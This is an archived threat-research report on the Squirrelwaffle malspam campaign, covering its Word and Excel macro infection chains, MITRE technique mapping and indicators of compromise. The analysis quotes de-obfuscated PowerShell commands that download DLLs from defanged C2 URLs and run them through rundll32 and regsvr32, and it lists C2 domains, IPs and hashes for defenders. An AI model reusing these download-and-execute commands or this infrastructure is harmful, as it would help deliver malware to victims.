{
	"id": "14490058-dfbb-4fe3-b2fd-0ff3638f9c40",
	"created_at": "2026-04-06T00:14:41.240074Z",
	"updated_at": "2026-04-10T03:31:13.746377Z",
	"deleted_at": null,
	"sha1_hash": "7b4cd8c608e511a70914032acdd31b3673afd190",
	"title": "A Virtual Baffle to Battle SquirrelWaffle",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2084231,
	"plain_text": "A Virtual Baffle to Battle SquirrelWaffle\r\nArchived: 2026-04-05 13:50:23 UTC\r\nBy: Max Malyutin – Orion Threat Research Team Leader\r\nWhile tracking malicious spam campaigns at the beginning of September 2021, we discovered a new villain that joined\r\nknown major actors including Trickbot, Bazarloader, Ursnif, Dridix, and IcedID in the email-based malware landscape.\r\nEmail-based campaigns are used to deliver and distribute large-scale phishing malspam and deploy different types of\r\nmalwares. These malicious emails often contain a .ZIP attachment, Microsoft Office document, or a URL link. The\r\nweaponized documents are responsible for downloading and executing next-stage malware payloads.\r\nThe new kid on the block’s name is Squirrelwaffle, and it was first seen in the wild at the start of September 2021.\r\nSquirrelwaffle MalDoc samples are tagged by researchers as “TR”, which stands for the malspam distribution infrastructure,\r\na tag that indicates a particular malspam distribution affiliate.\r\nWe started seeing samples uploaded into open malware databases (such as bazzar.abuse):\r\nWhen inspecting SquirrelWaffle on VirusTotal, we noticed there are additional samples, as can be seen here:\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 1 of 19\n\nSquirrelwaffle infection chain overview\r\nSquirrelwaffle compromises victims via a malspam campaign. Currently, Squirrelwaffle emails deliver a malicious URL link\r\nwhich leads to a ZIP file as part of the email content.\r\nThe victim downloads a ZIP file that contains a weaponized Microsoft Office document. The malicious document contains\r\nmacro code and a fake template that lures the victim to click on Enable Content. After the macros are executed, the\r\nmalicious document acts as Dropper. It drops a VBS file stored inside the MalDoc to the disk and launches it via cscript\r\ncommand.\r\nNext, the VBS script downloads five DLL modules from five different URLS via PowerShell command and invokes these\r\nmodules through a rundll32 command.\r\n.Currently, we know that the DLL modules enumerate the compromised host and download the next-stage payload from a\r\nCommand-and-Control (C2) Server. The downloaded file has a TXT extension. The TXT file is a portable executable file\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 2 of 19\n\n(EXE), which in fact is a Cobalt Strike beacon.\r\nMalware-Traffic-Analysis shared Squirrelwaffle to Cobalt Strike indicators and artifacts:\r\nhttps://www.malware-traffic-analysis.net/2021/09/17/index.html\r\nInfection chain of Word Squirrelwaffle releases (14 September – ):\r\n1. The user receives a phishing email with a malicious URL link to a ZIP file which stores a Microsoft Office\r\nweaponized document.\r\n2. The user opens the malicious weaponized Word document and is lured into clicking on “Enable content” (macros).\r\n3. The malicious VBA macro is executed and dropd the VBS (visual basic script) file to the ProgramData directory.\r\n4. The malicious VBA macro executes the VBS file via cscript.\r\n5. The VBS script executes PowerShell and CMD (Rundll32 executes via the CMD) processes.\r\n6. The PowerShell command downloads the Squirrelwaffle modules (DLLs).\r\n7. The rundll32 executes the Squirrelwaffle modules with ldr function.\r\n8. Enumeration actions are performed on the compromised host.\r\n9. Finally, a Cobalt Strike beacon is dropped and launched.\r\nUpdate 20/09/2021\r\nWe have observed another Squirrelwaffle infection. In this new variant, threat actors use malicious Excel documents instead\r\nof Word documents. The malicious Excel documents contain macro v4 (XLM) code instead of VBA code (Word\r\ndocuments).\r\nFurthermore, they changed the execution and the download methods.\r\nInfection chain of Word Squirrelwaffle releases (20 September – ):\r\n1. The user opens the malicious weaponized Excel document and is lured into clicking on “Enable content” (macros\r\nv4).\r\n2. The malicious macros v4 is executed and downloaded from a C2 server masquerading as DLL payloads.\r\n3. The malicious macros v4 execute masqueraded DLL payloads via regsvr32 command line.\r\n4. The regsvr32 executes the Squirrelwaffle modules.\r\nThis is part of an extensive series of guides about Malware Protection\r\nMITRE Attack-Navigator\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 3 of 19\n\nSquirrelwaffle infection chain analysis\r\nThe infection chain starts with a phishing email vector. Phishing technique T1566 has two sub-techniques: Spearphishing\r\nAttachment T1566.001 and Spearphishing Link T1566.002.\r\nSquirrelwaffle currently uses the Spearphishing Link technique by sending malicious emails with a URL to a ZIP file that\r\ncontains the malicious Word document.\r\nurlhaus.abuse.ch tag: SQUIRRELWAFFLE\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 4 of 19\n\nThreat actors’ motivation is to lure the victim to interact with the phishing email and download the ZIP file.\r\nThe next step of the infection is based on the user’s interaction with the phishing email. This step is related to User\r\nExecution technique T1204 which is part of the Execution TA0002 tactic.\r\nThis technique has two sub-techniques: Malicious Link T1204.001 and Malicious File T1204.002.\r\nThe user downloads the malicious ZIP file by using the URL link in the phishing email. The ZIP file contains a Microsoft\r\nOffice Word document.\r\nTo lure the victim to click on “Enable Content”, threat actors use a fake DocuSign template message.\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 5 of 19\n\nBelow, you can see an example of the Squirrelwaffle MalDoc requesting the user to click on the security warning button\r\n“Enable Content”. This allows the malicious document to execute code stored as a macro.\r\nOnce macros are enabled, the VBA executes (Command and Scripting Interpreter: Visual Basic: T1059.005) and executes\r\nthe AutoOpen function.\r\nThe AutoOpen macro runs automatically after opening the document and selecting “Enable Content”.\r\nAutoOpen function content leads us to bxh.eFile macro:\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 6 of 19\n\nThe bxh function contains obfuscated VBA code which decoded via StrReverse “Returns a string in which the character\r\norder of a specified string is reversed.”\r\nThe artifact extracted from the bxh function:\r\nPath: C:\\ProgramData\r\nFile Name: pin.vbs\r\nExecution command: cmd /k cscript .exe C:\\ProgramData\\pin.vbs\r\nUsing the OLEVBA tool, we have found several interesting artifacts:\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 7 of 19\n\nThe threat actors use a different technique to hide malicious code/strings such as URLs, IPs, commands, or even shellcode\r\ninside the malicious document.\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 8 of 19\n\nWe kept digging inside the MalDoc file and found a Form (t2) containing malicious VBS code.\r\nThe obfuscated VBS code is dropped to C:\\ProgramData directory:\r\nThe VBS file is written to the disk via the MalDoc file:\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 9 of 19\n\nThe next step that in the attack happens when macros are enabled. This executes a cmd command that spawns a cscript.exe\r\nprocess.\r\nExecution command: cmd /k cscript .exe C:\\ProgramData\\pin.vbs\r\nThe cscript process executes the pin.vbs file:\r\nWe have analyzed the VBS code and de-obfuscated it:\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 10 of 19\n\nLL1\\2\\3\\4\\5 (line 6-9, 11-14, 16-19, 21-24 and 26-29) stored PowerShell commands (de-obfuscated):\r\nIEX \"(New-Object\r\nNet.WebClient).DownloadFile('hxxps://priyacareers[.]com/u9hDQN9Yy7g/pt.html','C:\\ProgramData\\www1.dll')\"| IEX\r\nIEX (New-Object\r\nNet.WebClient).DownloadFile('hxxps://perfectdemos[.]com/Gv1iNAuMKZ/pt.html','C:\\ProgramData\\www2.dll')|IEX\r\nIEX (New-Object\r\nNet.WebClient).DownloadFile('hxxps://bussinessz[.]ml/ze8pCNTIkrIS/pt.html','C:\\ProgramData\\www3.dll')|IEX\r\nIEX (New-Object\r\nNet.WebClient).DownloadFile('hxxps://cablingpoint[.]com/ByH5NDoE3kQA/pt.html','C:\\ProgramData\\www4.dll')\r\nIEX (New-Object\r\nNet.WebClient).DownloadFile('https://bonus.corporatebusinessmachines.co.in/1Y0qVNce/pt.html','C:\\ProgramData\\www5.dll)|\r\nLines 34-38 execute a PowerShell instance with each command above (five PS instances in total).\r\nEach PowerShell command uses WebClient Class and DownloadFile method which allows the PowerShell command to\r\ndownload a DLL file and drop the file to the C:\\ProgramData directory.\r\nOne of the PowerShell instances command-line:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" $Nano='JOOEX'.replace('JOO','I');sal OY\r\n$Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile';\r\n$bb='(''hxxps://priyacareers[.]com/u9hDQN9Yy7g/pt.html'',''C:\\ProgramData\\www1.dll'')';$FOOX =\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 11 of 19\n\n($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;\r\nBy sniffing the network packets of the PowerShell instances, we have found five IP addresses related to the five URLs\r\nobserved in the VBS script:\r\n108[.]167[.]172[.]125\r\n192[.]185[.]52[.]124\r\n204[.]11[.]58[.]87\r\n162[.]241[.]85[.]65\r\nIn line 39, threat actors use a Sleep function. The function performs a sleep action for 15 seconds to wait with the next step\r\nof the execution to allow a full download of all the DLL payloads:\r\nWScript.Sleep(15000)\r\nAfter the Sleep action, the VBS script executes cmd.exe processes that swap a rundll32.exe which runs the following\r\ncommand:\r\ncmd /c rundll32.exe C:\\ProgramData\\www1.dll,ldr\r\ncmd /c rundll32.exe C:\\ProgramData\\www2.dll,ldr\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 12 of 19\n\ncmd /c rundll32.exe C:\\ProgramData\\www3.dll,ldr\r\ncmd /c rundll32.exe C:\\ProgramData\\www4.dll,ldr\r\ncmd /c rundll32.exe C:\\ProgramData\\www5.dll,ldr\r\nThe CMD command executes five times a rundll32 process to load the downloaded DLLs with the ldr function, the\r\nSquirrelwaffle DLL payloads named LdrLoader due to the export function.\r\nThe cscript script (pin.vbs) executes CMD and PowerShell processes:\r\nFull process tree execution flow:\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 13 of 19\n\nThe downloaded DLL modules (LdrLoader) are all the same file. Threat actors have five URLs, and each stores the DLL\r\nmodule. We believe that this is a backup method in this case if one of the URLs is not responding.\r\nUpdate 20/09/2021\r\nWe have detected a new Squirrelwaffle sample which this time have been Excel malicious documents.\r\nThe Excel documents also have the unique pattern name diagram_[RandomChar0-9].xls\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 14 of 19\n\nThe new Excel documents use a new fake template to lure the victim to click on the “Enable Content” security button:\r\nThe threat actors use several defensive evasion techniques to bypass security application, AVs, and EDRs. These techniques\r\nmake researchers and security analysts’ life harder.\r\nHidden Sheets\r\nWhite color font for the macros\r\nObfuscation and scrambling of the macros in deferent sheets\r\nHidden Sheets\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 15 of 19\n\nWhite macro font color\r\nObfuscation and scrambling of the macros in deferent sheets\r\nThe macro type is different in the Word documents. Threat actors use VBA code in, while in Excel the macro type is macro\r\nv4 (XLM).\r\nmacro v4 (XLM), example:\r\nIn both Excel and Word documents, threat actors use the “Auto Open” function to execute the macros.\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 16 of 19\n\nAfter extracting some artifacts, we have found the following:\r\nWin API:\r\nKernel32 CreateDirectoryA\r\nUrlmon URLDownloadToFileA\r\nShell32 ShellExecuteA\r\nC2 URL:\r\nhxxps://cortinastelasytrazos[.]com/Yro6Atvj/sec[.]html\r\nhxxps://orquideavallenata[.]com/4jmDb0s9sg/sec[.]html\r\nhxxps://fundacionverdaderosheroes[.]com/gY0Op5Jkht/sec[.]html\r\nFile full path and name:\r\nC:\\Datop\\test.test\r\nC:\\Datop\\test1.test\r\nC:\\Datop\\test2.test\r\nExecution command:\r\nregsvr32 C:\\Datop\\test*.test\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 17 of 19\n\nThreat actors change the download and the execution methods.\r\nFor the download, they use the urlmon and URLDowenloadToFileA Win API functions and for the execution, they use\r\nShell32 ShellExecuteA.\r\nIn this scenario, we have detected three DLL payloads instead of five (Word document flow). DLL payloads are executed by\r\nabusing the legitimate Microsoft file (LOLbin – “Living off the land”) Regsvr32.\r\nNetwork connection to the C2 server that stores the DLL payloads performed by the Excel document:\r\n108[.]167[.]165[.]249\r\n95[.]101[.].89[.]74\r\nFull execution flow:\r\nIndicators of compromise\r\nMalDoc\r\nce31d139e6ea2591a8a15fcf37232f97c799e9c5d1410ef86b54a444a7d24d0f\r\n77c8d399c3cdbb22502432f6ab49a8e56a2a8e4bf9bd02b37797a0ae5962b7d6\r\naaea40485a04b071bd65fc732e70630b314cdadf4f03ba9b7a0030ccf63b1115\r\n637af43b3f656ffa8839ab8f23ff2aad7910cc4bd9ed0551d337a02341864e05\r\n079a22b70109d00f571ea22079cde3baf9ebe6a3afd93347e09c38c7fccf38dc\r\na56c6b3d58c66042effa180738197415d840443ba839bb7f45042bdb9e51c04f\r\nb7fa56ddedd0fff91af460edc504574ddc7b1df97d33d635d854e71a7be34060\r\n0e52e26aff6f4cf678515e7c1a491603085e717458cfc12d2b95d46c98eda7ba\r\n783e3b86c24af82773b0dae3e738c46a79de252b1bcc5945b65da0d040ee6e9d\r\n65f594b4cb31e25f711dd954700bab6d2ac507bd7aab184cc500812b08f8ee03\r\n3f453d0703fa81709d25c6ade25215066f38abceec9699b7b49fb9b4171bbb50\r\n182a11ae9b66c9abcd9fd9dbd7a0176a5895f354443e31ab3258182ca62d3a47\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 18 of 19\n\n5401103614610b1e109c674b2f90732e0a056be81dbdd8886324aa2d41f0cf2a\r\nfc42fbe6525ef4b976bca50eb1c4be6c1696e180c55fbeb5f1c9ce5d32957c88\r\n3f453d0703fa81709d25c6ade25215066f38abceec9699b7b49fb9b4171bbb50\r\n182a11ae9b66c9abcd9fd9dbd7a0176a5895f354443e31ab3258182ca62d3a47\r\nMalDoc C2 Servers\r\nghapan[.]com\r\nyoowi[.]net\r\ngruasingenieria[.]pe\r\nchaturanga[.]groopy[.]com\r\nlotolands[.]com\r\nbonus[.]corporatebusinessmachines[.]co[.]in\r\nbussiness-z[.]ml\r\nperfectdemos[.]com\r\ncablingpoint[.]com\r\npriyacareers[.]com\r\nDLL loader payloads\r\nad8cb4504a5af45ffa91699b017ffa0bc9808e1b170027ab54fe31661279b9b6\r\n813a9b03c6c1caec4eca8a867dcfbda7860bca6a5d481acb4c131c1a868d4b48\r\n0d66e879f6e7bfa3ab9eb864094912ffd59c14792ed1d2e087e465e8098150fb\r\n671f477c3039786c5f3553760377be03b91bfb66f31ba9370ed2193192cf5b4e\r\n85d0b72fe822fd6c22827b4da1917d2c1f2d9faa838e003e78e533384ea80939\r\nDLL loader C2 Server\r\njhehosting[.]com\r\nhrms[.]prodigygroupindia[.]com\r\nbartek-lenart[.]pl\r\ncentralfloridaasphalt[.]com\r\namjsys[.]com\r\nmercyfoundationcio[.]org\r\nnovamarketing[.]com[.]pk\r\nSource: https://www.cynet.com/understanding-squirrelwaffle/\r\nhttps://www.cynet.com/understanding-squirrelwaffle/\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cynet.com/understanding-squirrelwaffle/"
	],
	"report_names": [
		"understanding-squirrelwaffle"
	],
	"threat_actors": [
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434481,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7b4cd8c608e511a70914032acdd31b3673afd190.pdf",
		"text": "https://archive.orkl.eu/7b4cd8c608e511a70914032acdd31b3673afd190.txt",
		"img": "https://archive.orkl.eu/7b4cd8c608e511a70914032acdd31b3673afd190.jpg"
	}
}